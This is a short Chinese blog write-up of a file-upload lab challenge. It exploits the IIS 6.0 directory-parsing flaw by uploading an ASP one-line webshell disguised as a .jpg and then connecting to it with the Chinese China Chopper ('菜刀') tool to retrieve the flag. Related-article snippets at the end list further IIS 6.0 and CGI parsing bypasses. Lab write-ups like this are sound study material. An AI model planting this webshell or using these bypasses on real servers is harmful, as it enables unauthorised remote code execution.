IIS6.0 有以下文件解析漏洞:
查看源码:
image.png
这里只允许后缀为 jpg 的文件上传,
我的一句话木马内容为:
<%eval request("heroes")%>
保存为 ladybird253.jpg,上传结果如下:
image.png
可以看到上传后的文件所在的目录为 a.asp,这就可以利用 开头提到的 IIS6.0 的解析漏洞,在 xxx.asp 目录下的文件都会被当做asp脚本。
然后用菜刀连接:
image.png
进入保存上传文件的目录中找到flag文件:
image.png
IIS6.0 有以下文件解析漏洞: 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析; 文件...
IIS6.0 有以下文件解析漏洞: 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析; 文件...
IIS6.0 有以下文件解析漏洞: 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析; 文件...
解析漏洞 IIS解析漏洞 IIS6.0在解析文件时存在以下两个解析漏洞 WebDav漏洞 Apache解析漏洞 N...
利用IIS6.0的解析漏洞,绕过上传。 目录-test.asp;任意文件名下优先以asp解析目录以下的文件 -te...
解析导致的上传漏洞 1.IIS6.0站上的目录路径检测解析绕过上传漏洞 默认 遇到/就不解析后面的了IIS6.0目...
中间件漏洞 IIS IIS6.0文件解析 xx.asp;.jpg IIS6.0目录解析 xx.asp/1.jpg ...
中间件可解析的后缀 中间件漏洞 IIS IIS6.0文件解析 xx.asp;.jpg IIS6.0目录解析 xx....
解析漏洞 IIS6.0在解析文件时存在以下两个解析漏洞。 1.当建立*.asa、*.asp格式的文件夹时,其目录下...
这道题利用的是CGI的一个解析漏洞:-> 当 x_pathinfo 开启时,会导致下面的问题:比如,访问 http...
本文标题:文件上传靶场—IIS6.0解析漏洞(三)
本文链接:https://www.haomeiwen.com/subject/kawkfqtx.html
网友评论